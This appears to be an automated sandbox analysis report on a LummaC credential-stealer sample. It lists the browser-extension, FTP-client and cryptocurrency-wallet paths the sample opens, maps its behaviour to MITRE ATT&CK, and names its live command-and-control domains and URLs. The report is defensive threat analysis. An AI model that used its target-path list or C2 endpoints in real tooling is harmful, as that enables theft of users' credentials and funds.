Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior

Source: Yara match	File source: 00000004.00000003.2145451743.00000000032DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2145593469.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 7680, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 7680, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	11 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	41 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	311 Process Injection	41 Input Capture	121 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Native API	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	3 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Peripheral Device Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	24 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Setup_W.exe	64%	Virustotal		Browse
Setup_W.exe	47%	ReversingLabs	Win32.Spyware.Lummastealer
Setup_W.exe	100%	Avira	HEUR/AGEN.1318174
Setup_W.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\glfw.4281411633.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://mooncobudy.click/api	0%	Avira URL Cloud	safe
https://mooncobudy.click:443/api	0%	Avira URL Cloud	safe
https://mooncobudy.click/);	0%	Avira URL Cloud	safe
mooncobudy.click	0%	Avira URL Cloud	safe
https://mooncobudy.click:443/apiPeYB	0%	Avira URL Cloud	safe
https://mooncobudy.click/api7	0%	Avira URL Cloud	safe
https://mooncobudy.click/	0%	Avira URL Cloud	safe
https://mooncobudy.click/apiD	0%	Avira URL Cloud	safe
https://mooncobudy.click:443/api2o4p.default-release/key4.dbPK	0%	Avira URL Cloud	safe
https://mooncobudy.click/apiF9tl	0%	Avira URL Cloud	safe
https://mooncobudy.click/s	0%	Avira URL Cloud	safe
https://mooncobudy.click/t	0%	Avira URL Cloud	safe
https://mooncobudy.click/m	0%	Avira URL Cloud	safe
https://mooncobudy.click/api/	0%	Avira URL Cloud	safe
https://mooncobudy.click/apiO	0%	Avira URL Cloud	safe
https://mooncobudy.click/apiK	0%	Avira URL Cloud	safe
https://mooncobudy.click/I:	0%	Avira URL Cloud	safe
https://mooncobudy.click/s):	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mooncobudy.click	104.21.44.57	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
necklacebudi.lat	false		high
aspecteirs.lat	false		high
https://mooncobudy.click/api	true	Avira URL Cloud: safe	unknown
sustainskelet.lat	false		high
crosshuaht.lat	false		high
rapeflowwj.lat	false		high
mooncobudy.click	true	Avira URL Cloud: safe	unknown
energyaffai.lat	false		high
grannyejh.lat	false		high
discokeyus.lat	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	BitLockerToGo.exe, 00000004.00000003.2115142915.0000000005551000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	BitLockerToGo.exe, 00000004.00000003.2091097029.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2064825714.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2090974461.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2064629217.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2064540383.00000000055AF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	BitLockerToGo.exe, 00000004.00000003.2115142915.0000000005551000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	BitLockerToGo.exe, 00000004.00000003.2064629217.0000000005583000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	BitLockerToGo.exe, 00000004.00000003.2114890767.0000000005679000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mooncobudy.click:443/api2o4p.default-release/key4.dbPK	BitLockerToGo.exe, 00000004.00000002.2293687502.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2169622819.0000000003261000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mooncobudy.click/apiD	BitLockerToGo.exe, 00000004.00000002.2293872061.00000000032FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292943982.00000000032FC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mooncobudy.click:443/api	BitLockerToGo.exe, 00000004.00000002.2293687502.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2145909317.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063109527.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2169622819.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2145537455.0000000003261000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mooncobudy.click/apiF9tl	BitLockerToGo.exe, 00000004.00000003.2292404891.00000000032E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	BitLockerToGo.exe, 00000004.00000003.2115142915.0000000005551000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mooncobudy.click:443/apiPeYB	BitLockerToGo.exe, 00000004.00000002.2293687502.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003261000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mooncobudy.click/);	BitLockerToGo.exe, 00000004.00000003.2063212917.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063270598.0000000003299000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mooncobudy.click/api7	BitLockerToGo.exe, 00000004.00000003.2145451743.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2169738032.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2293687502.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.0000000003286000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	BitLockerToGo.exe, 00000004.00000003.2091097029.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2064825714.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2090974461.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2064629217.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2064540383.00000000055AF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	BitLockerToGo.exe, 00000004.00000003.2114890767.0000000005679000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mooncobudy.click/	BitLockerToGo.exe, 00000004.00000003.2292404891.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2293085450.0000000003299000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2145537455.0000000003261000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mooncobudy.click/api/	BitLockerToGo.exe, 00000004.00000002.2293687502.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.0000000003286000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mooncobudy.click/t	BitLockerToGo.exe, 00000004.00000002.2293779528.000000000329A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2293085450.0000000003299000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mooncobudy.click/s	BitLockerToGo.exe, 00000004.00000003.2169738032.0000000003286000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mooncobudy.click/m	BitLockerToGo.exe, 00000004.00000003.2063212917.0000000003286000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.micro	BitLockerToGo.exe, 00000004.00000003.2145451743.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063212917.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2169738032.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063270598.0000000003299000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2145610434.0000000003299000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292604362.00000000032D0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.microsof	BitLockerToGo.exe, 00000004.00000003.2064540383.00000000055B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	BitLockerToGo.exe, 00000004.00000003.2113869497.0000000005577000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mooncobudy.click/I:	BitLockerToGo.exe, 00000004.00000002.2293779528.000000000329A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2293085450.0000000003299000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	BitLockerToGo.exe, 00000004.00000003.2064629217.0000000005583000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mooncobudy.click/apiK	BitLockerToGo.exe, 00000004.00000002.2293872061.00000000032FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292943982.00000000032FC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
